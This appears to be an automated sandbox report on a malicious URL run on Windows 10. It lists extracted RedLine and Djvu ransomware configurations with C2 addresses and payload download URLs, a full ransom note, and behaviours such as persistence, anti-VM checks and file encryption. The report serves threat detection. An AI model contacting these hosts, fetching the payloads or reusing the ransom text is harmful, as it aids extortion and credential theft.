Analysis
max time kernel: 1800s
max time network: 1803s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12-09-2022 18:07
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://www.logixoft.com/es-es/index
Resource: win10v2004-20220812-en
General
Malware Config
Extracted
Path: C:\Users\Admin\AppData\Local\Temp\5068_1412926883\us_tv_and_film.txt
Extracted
Path: C:\Users\Admin\AppData\Local\Temp\20004_2028133613\us_tv_and_film.txt
Extracted
Path: C:\_readme.txt
Family: djvu
Emails: support@bestyourmail.ch, datarestorehelp@airmail.cc
URL: https://we.tl/t-xuPJqoyzQE
Extracted
Family: redline
Botnet: 5
C2: 79.110.62.196:26277
auth_value: febe6965b41d2583ad2bb6b5aa23cfd5
Extracted
Family: redline
Botnet: nam6.2
C2: 103.89.90.61:34589
auth_value: 4040fe7c77de89cf1a6f4cebd515c54c
Extracted
Family: redline
Botnet: ruzki14
C2: 176.113.115.146:9582
auth_value: 688c6d70531c05d3fba22723e72366f6
Extracted
Family: redline
Botnet: sep10as1
C2: 185.215.113.122:15386
auth_value: e45012eae57b2e57b34752fc802550c3
Extracted
Family: redline
Botnet: Lyla.11.09
C2: 185.215.113.216:21921
auth_value: a1e5192e588aa983d678ceb4d6e0d8b5
Extracted
Family: nymaim
C2: 208.67.104.97, 85.31.46.167
Extracted
Family: djvu
C2: http://acacaca.org/test3/get.php
extension: .eemv
offline_id: 5IVlpkccZlJz0AZ5atgGWVKe9CGAnXjohDf40mt1
payload_url: http://rgyui.top/dl/build2.exe, http://acacaca.org/files/1/build3.exe
ransomnote: ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-0e5rCKsYCc Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0560Jhyjd
Extracted
Family: redline
Botnet: 3108_RUZKI
C2: 213.219.247.199:9452
auth_value: f71fed1cd094e4e1eb7ad1c53e542bca
Signatures
-
DcRat 10 IoCs
DarkCrystal (DC) is a new .NET RAT, active since June 2019, that is capable of loading additional plugins.
Processes:
pid 13516 schtasks.exe
pid 19632 schtasks.exe
pid 22684 schtasks.exe
Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation (chrome.exe)
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ece638ff-5062-40ce-bed5-d6d234b910ab\\OtV01fNRpBSqIMPnvBIz_5U1.exe\" --AutoStart" (OtV01fNRpBSqIMPnvBIz_5U1.exe)
pid 15500 schtasks.exe
pid 15844 schtasks.exe
pid 15852 schtasks.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Clipper = "\"C:\\Users\\Admin\\AppData\\Roaming\\Clipper\\Clipper.exe\" " (xsv.exe)
pid 70448 schtasks.exe
-
Detected Djvu ransomware 2 IoCs
Processes:
resource behavioral1/memory/2400-325-0x0000000002320000-0x000000000243B000-memory.dmp yara_rule family_djvu
resource behavioral1/memory/5632-345-0x0000000000400000-0x0000000000537000-memory.dmp yara_rule family_djvu
-
Detects Smokeloader packer 1 IoCs
Processes:
resource behavioral1/memory/2220-347-0x00000000001C0000-0x00000000001C9000-memory.dmp yara_rule family_smokeloader
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process: pid 6460, pid_target 51008, rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process: pid 12352, pid_target 51008, rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process: pid 1520, pid_target 51008, rundll32.exe
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
Processes:
resource behavioral1/memory/2412-196-0x0000000000A70000-0x0000000000AD0000-memory.dmp yara_rule family_redline
resource behavioral1/memory/4028-203-0x00000000009D0000-0x00000000009F8000-memory.dmp yara_rule family_redline
resource behavioral1/memory/50916-252-0x0000000000400000-0x0000000000460000-memory.dmp yara_rule family_redline
resource behavioral1/memory/50956-255-0x00000000007D0000-0x00000000007F8000-memory.dmp yara_rule family_redline
resource behavioral1/memory/2068-336-0x0000000000400000-0x0000000000420000-memory.dmp yara_rule family_redline
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
Processes:
PID 12548 (svchost.exe) created 12396 (E35.exe)
PID 12548 (svchost.exe) created 13416 (csrss.exe)
PID 12548 (svchost.exe) created 13416 (csrss.exe)
PID 12548 (svchost.exe) created 13416 (csrss.exe)
PID 12548 (svchost.exe) created 13416 (csrss.exe)
PID 12548 (svchost.exe) created 20616 (f801950a962ddba14caaa44bf084b55c.exe)
PID 12548 (svchost.exe) created 20616 (f801950a962ddba14caaa44bf084b55c.exe)
-
Enumerates VirtualBox registry keys 2 TTPs 30 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (Updater.exe)
-
Blocklisted process makes network request 10 IoCs
Processes:
cmd.exe (pid 5564): flows 610, 621, 629, 631, 633, 1248, 1252, 1435, 1439
msiexec.exe (pid 46012): flow 1410
-
Downloads MZ/PE file
-
Drops file in Drivers directory 7 IoCs
Processes:
File opened for modification C:\Windows\system32\DRIVERS\klif.sys (MsiExec.exe)
File opened for modification C:\Windows\system32\DRIVERS\SETC14B.tmp (MsiExec.exe)
File created C:\Windows\system32\DRIVERS\SETC14B.tmp (MsiExec.exe)
File opened for modification C:\Windows\system32\DRIVERS\klflt.sys (MsiExec.exe)
File opened for modification C:\Windows\SysWOW64\drivers\rvlkl.sys (rkfree_setup64.exe)
File opened for modification C:\Windows\system32\DRIVERS\SETC14A.tmp (MsiExec.exe)
File created C:\Windows\system32\DRIVERS\SETC14A.tmp (MsiExec.exe)
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
File renamed C:\Users\Admin\Pictures\UnregisterEnter.tiff => C:\Users\Admin\Pictures\UnregisterEnter.tiff.mmdt (1CEC.exe)
File opened for modification C:\Users\Admin\Pictures\SendSelect.tif.mmdt (OtV01fNRpBSqIMPnvBIz_5U1.exe)
File opened for modification C:\Users\Admin\Pictures\SyncUnlock.crw.mmdt (OtV01fNRpBSqIMPnvBIz_5U1.exe)
File renamed C:\Users\Admin\Pictures\SyncUnlock.crw => C:\Users\Admin\Pictures\SyncUnlock.crw.mmdt (1CEC.exe)
File opened for modification C:\Users\Admin\Pictures\UnregisterEnter.tiff (1CEC.exe)
File opened for modification C:\Users\Admin\Pictures\ResolveMount.tif.mmdt (OtV01fNRpBSqIMPnvBIz_5U1.exe)
File opened for modification C:\Users\Admin\Pictures\UnregisterEnter.tiff.mmdt (OtV01fNRpBSqIMPnvBIz_5U1.exe)
File renamed C:\Users\Admin\Pictures\ResolveMount.tif => C:\Users\Admin\Pictures\ResolveMount.tif.mmdt (1CEC.exe)
File renamed C:\Users\Admin\Pictures\SendSelect.tif => C:\Users\Admin\Pictures\SendSelect.tif.mmdt (1CEC.exe)
-
Processes:
resource behavioral1/memory/1944-209-0x0000000140000000-0x0000000140604000-memory.dmp yara_rule vmprotect
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (Updater.exe)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (Updater.exe)
-
Checks computer location settings 2 TTPs 15 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation by each of: 1GPK0P7aXVq71TQv22DqyPmM.exe, MID2G1BELCG7H55.exe, AA09.exe, build2.exe, 8yRrDWZmXks9IvL_IS0nj_06.exe, epJtHFnMJr1xk7GmIRKBf6e5.exe, dllhusts.exe, nIS_6lAPkuiAD1vGQNmAscKo.exe, OtV01fNRpBSqIMPnvBIz_5U1.exe, 1CEC.exe, rkfree_setup64.exe, OtV01fNRpBSqIMPnvBIz_5U1.exe, build2.exe, 9BFF.exe, 1CEC.exe
-
Loads dropped DLL 64 IoCs
Processes:
pid 12632 regsvr32.exe (1 load)
pid 4784 java.exe (3 loads)
pid 4180 regsvr32.exe (1 load)
pid 6496 rundll32.exe (1 load)
pid 6136 filezilla.exe (21 loads)
pid 11340 build2.exe (3 loads)
pid 11272 svchost.exe (2 loads)
pid 11816 regsvr32.exe (2 loads)
pid 12372 rundll32.exe (1 load)
pid 1248 rundll32.exe (1 load)
pid 8276 taskmgr.exe (1 load)
pid 70496 tor.exe (9 loads)
pid 15284 build2.exe (3 loads)
pid 41308 software_reporter_tool.exe (7 loads)
pid 44904 kav21.3.10.391en_26075.exe (3 loads)
pid 44508 TEST_WPF.EXE (1 load)
pid 46088 MsiExec.exe (4 loads)
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
Processes:
Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run (msedge.exe)
Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run (msedge.exe)
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce (9ttTG63SaCJEubu9iGdOslGV.exe)
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" (9ttTG63SaCJEubu9iGdOslGV.exe)
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ece638ff-5062-40ce-bed5-d6d234b910ab\\OtV01fNRpBSqIMPnvBIz_5U1.exe\" --AutoStart" (OtV01fNRpBSqIMPnvBIz_5U1.exe)
Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run (xsv.exe)
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" (E35.exe)
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" (csrss.exe)
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Clipper = "\"C:\\Users\\Admin\\AppData\\Roaming\\Clipper\\Clipper.exe\" " (xsv.exe)
-
Checks for any installed AV software in registry 1 TTPs 48 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (Updater.exe)
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (kav21.3.10.391en_26075.exe)
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
File opened (read-only) by msiexec.exe: \??\W:, \??\E:, \??\F:, \??\L:, \??\O:, \??\S:, \??\Z:, \??\G:, \??\N:, \??\Q:, \??\R:, \??\X:, \??\A:, \??\H:, \??\I:, \??\M:, \??\U:, \??\V:, \??\Y:, \??\B:, \??\J:, \??\K:, \??\P:, \??\T:
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 24 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
ipinfo.io: flows 341, 343, 366, 367, 487, 488, 534, 535, 538
api.2ip.ua: flows 592, 593, 618, 705, 721, 1419, 1420, 1430
api.ipify.org: flow 1191
myexternalip.com: flows 630, 631, 1242, 1248, 1434, 1435
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
File opened for modification \??\PhysicalDrive0 (kav21.3.10.391en_26075.exe)
-
Drops file in System32 directory 21 IoCs
Processes:
File opened for modification C:\Windows\System32\GroupPolicy (Install.exe, 5 times)
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI (Install.exe, 5 times)
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini (Install.exe, 5 times)
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol (Install.exe, 4 times)
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol (Install.exe)
File created C:\Windows\system32\rvlkl.exe (rkfree_setup64.exe)
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Updater.exe
pid | process
8360 | Updater.exe
-
Suspicious use of SetThreadContext 36 IoCs
Processes:
Hees5gyHhxQ9S2TKRxCAvjcm.exe, 49AAFB727CL5GDI.exe, vqaxOmEozavyS1F_VZNHcPSf.exe, 0M20GBJKA66FG9A.exe, KBHKAC88D1F3HM2.exe, dllhusts.exe, OtV01fNRpBSqIMPnvBIz_5U1.exe, qkftJGDPHrj6GpoYfaz9kGzw.exe, Mmwt5y3s3zj3YZRq2H7QWLkZ.exe, build2.exe, 1CEC.exe, 3EEC.exe, build3.exe, mstsca.exe
description | pid | process | target process
PID 2612 set thread context of 2204 | 2612 | Hees5gyHhxQ9S2TKRxCAvjcm.exe | Hees5gyHhxQ9S2TKRxCAvjcm.exe
PID 40852 set thread context of 50956 | 40852 | 49AAFB727CL5GDI.exe | 49AAFB727CL5GDI.exe
PID 4324 set thread context of 50916 | 4324 | vqaxOmEozavyS1F_VZNHcPSf.exe | AppLaunch.exe
PID 51104 set thread context of 50772 | 51104 | 0M20GBJKA66FG9A.exe | 0M20GBJKA66FG9A.exe
PID 50840 set thread context of 47800 | 50840 | KBHKAC88D1F3HM2.exe | KBHKAC88D1F3HM2.exe
PID 744 set thread context of 3772 | 744 | dllhusts.exe | dllhusts.exe
PID 2400 set thread context of 5632 | 2400 | OtV01fNRpBSqIMPnvBIz_5U1.exe | OtV01fNRpBSqIMPnvBIz_5U1.exe
PID 3608 set thread context of 2068 | 3608 | qkftJGDPHrj6GpoYfaz9kGzw.exe | RegAsm.exe
PID 3836 set thread context of 6728 | 3836 | Mmwt5y3s3zj3YZRq2H7QWLkZ.exe | InstallUtil.exe
PID 8820 set thread context of 11168 | 8820 | OtV01fNRpBSqIMPnvBIz_5U1.exe | OtV01fNRpBSqIMPnvBIz_5U1.exe
PID 4364 set thread context of 11340 | 4364 | build2.exe | build2.exe
PID 12596 set thread context of 13612 | 12596 | 1CEC.exe | 1CEC.exe
PID 13780 set thread context of 70356 | 13780 | 3EEC.exe | AppLaunch.exe
PID 13752 set thread context of 70588 | 13752 | 1CEC.exe | 1CEC.exe
PID 14588 set thread context of 15284 | 14588 | build2.exe | build2.exe
PID 15148 set thread context of 15464 | 15148 | build3.exe | build3.exe
PID 19572 set thread context of 19608 | 19572 | mstsca.exe | mstsca.exe
PID 22576 set thread context of 22652 | 22576 | mstsca.exe | mstsca.exe
PID 25176 set thread context of 25240 | 25176 | mstsca.exe | mstsca.exe
PID 35576 set thread context of 35636 | 35576 | mstsca.exe | mstsca.exe
PID 36908 set thread context of 36924 | 36908 | mstsca.exe | mstsca.exe
PID 38292 set thread context of 33528 | 38292 | mstsca.exe | mstsca.exe
PID 41860 set thread context of 42096 | 41860 | mstsca.exe | mstsca.exe
PID 44024 set thread context of 44128 | 44024 | mstsca.exe | mstsca.exe
PID 46572 set thread context of 46604 | 46572 | mstsca.exe | mstsca.exe
PID 46804 set thread context of 46828 | 46804 | mstsca.exe | mstsca.exe
PID 46932 set thread context of 46960 | 46932 | mstsca.exe | mstsca.exe
PID 47172 set thread context of 47392 | 47172 | OtV01fNRpBSqIMPnvBIz_5U1.exe | OtV01fNRpBSqIMPnvBIz_5U1.exe
PID 47968 set thread context of 47984 | 47968 | mstsca.exe | mstsca.exe
PID 47552 set thread context of 47740 | 47552 | mstsca.exe | mstsca.exe
PID 48192 set thread context of 48228 | 48192 | mstsca.exe | mstsca.exe
PID 48376 set thread context of 48408 | 48376 | mstsca.exe | mstsca.exe
PID 48524 set thread context of 48544 | 48524 | mstsca.exe | mstsca.exe
PID 48584 set thread context of 48608 | 48584 | OtV01fNRpBSqIMPnvBIz_5U1.exe | OtV01fNRpBSqIMPnvBIz_5U1.exe
PID 48744 set thread context of 48768 | 48744 | mstsca.exe | mstsca.exe
PID 48960 set thread context of 48980 | 48960 | mstsca.exe | mstsca.exe
-
Drops file in Program Files directory 18 IoCs
Processes:
CDFD.exe, tW7Y0_b8aGCZGB9K4Cnu3Izl.exe, elevation_service.exe
description | ioc | process
File created | C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\mode-ecb.js | CDFD.exe
File created | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | tW7Y0_b8aGCZGB9K4Cnu3Izl.exe
File opened for modification | C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\_metadata\verified_contents.json | elevation_service.exe
File created | C:\Program Files\aieoplapobidheellikiicjfpamacpfd\icon.png | CDFD.exe
File created | C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js | CDFD.exe
File created | C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\content.js | CDFD.exe
File created | C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\ChromeRecoveryCRX.crx | elevation_service.exe
File created | C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\jquery-3.3.1.min.js | CDFD.exe
File created | C:\Program Files\aieoplapobidheellikiicjfpamacpfd\manifest.json | CDFD.exe
File created | C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\ChromeRecovery.exe | elevation_service.exe
File opened for modification | C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\ChromeRecovery.exe | elevation_service.exe
File created | C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\manifest.json | elevation_service.exe
File opened for modification | C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\manifest.json | elevation_service.exe
File created | C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir42212_473247478\_metadata\verified_contents.json | elevation_service.exe
File created | C:\Program Files\aieoplapobidheellikiicjfpamacpfd\background.html | CDFD.exe
File created | C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\aes.js | CDFD.exe
File created | C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\pad-nopadding.js | CDFD.exe
File opened for modification | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | tW7Y0_b8aGCZGB9K4Cnu3Izl.exe
-
Drops file in Windows directory 30 IoCs
Processes:
csrss.exe, msiexec.exe, MsiExec.exe, E35.exe, cmd.exe, kav21.3.10.391en_26075.exe
description | ioc | process
File opened for modification | C:\Windows\windefender.exe | csrss.exe
File created | C:\Windows\Installer\e68a853.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIAC5B.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIAC7C.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIB107.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIB967.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIC05E.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\e68a853.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIAC6C.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIAE63.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIAE73.tmp | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File created | C:\Windows\Installer\SourceHash{4FC79BE9-AD63-46C0-9626-E4F6BCE6A976} | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIB792.tmp | msiexec.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | MsiExec.exe
File created | C:\Windows\Inf\oem0.PNF | MsiExec.exe
File opened for modification | C:\Windows\rss | E35.exe
File created | C:\Windows\rss\csrss.exe | E35.exe
File created | C:\Windows\windefender.exe | csrss.exe
File created | C:\Windows\Tasks\java.job | cmd.exe
File opened for modification | C:\Windows\installer | kav21.3.10.391en_26075.exe
File opened for modification | C:\Windows\Installer\MSIB165.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIB416.tmp | msiexec.exe
File created | C:\Windows\Inf\oem1.PNF | MsiExec.exe
File opened for modification | C:\Windows\Installer\MSIAB7F.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIAE43.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIAF8E.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIAFBE.tmp | msiexec.exe
-
Launches sc.exe 2 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
sc.exe
pid | process
70624 | sc.exe
20936 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
Processes:
WerFault.exe
pid | pid_target | process | target process
16960 | 1944 | WerFault.exe | X70ItBxukSvymp13PgQhBSOh.exe
6680 | 6496 | WerFault.exe | rundll32.exe
12056 | 11996 | WerFault.exe | 8B35.exe
12120 | 11976 | WerFault.exe | 80E3.exe
12912 | 12372 | WerFault.exe | rundll32.exe
13004 | 1248 | WerFault.exe | rundll32.exe
13296 | 13244 | WerFault.exe | F3F5.exe
67524 | 24400 | WerFault.exe | explorer.exe
19716 | 19588 | WerFault.exe | ddefwhh
47048 | 46916 | WerFault.exe | ddefwhh
-
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
0ESIFYudXNYZaYrWCRa9HdY_.exe, taskmgr.exe
description | ioc | process
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 0ESIFYudXNYZaYrWCRa9HdY_.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 0ESIFYudXNYZaYrWCRa9HdY_.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 0ESIFYudXNYZaYrWCRa9HdY_.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
build2.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | build2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | build2.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | build2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | build2.exe
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exe
pid | process
15500 | schtasks.exe
15844 | schtasks.exe
15852 | schtasks.exe
19632 | schtasks.exe
22684 | schtasks.exe
13516 | schtasks.exe
70448 | schtasks.exe
-
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exe
pid | process
11648 | timeout.exe
15636 | timeout.exe
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exe
pid | process
11148 | tasklist.exe
10780 | tasklist.exe
-
Enumerates system info in registry 2 TTPs 17 IoCs
Processes:
msedge.exe, SearchApp.exe, chrome.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | SearchApp.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | SearchApp.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
-
Kills process with taskkill 4 IoCs
Processes:
taskkill.exe
pid | process
11620 | taskkill.exe
13188 | taskkill.exe
15608 | taskkill.exe
6944 | taskkill.exe
-
Processes:
explorer.exe, KD005C2835911EG.exe
description | ioc | process
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | KD005C2835911EG.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | KD005C2835911EG.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | KD005C2835911EG.exe
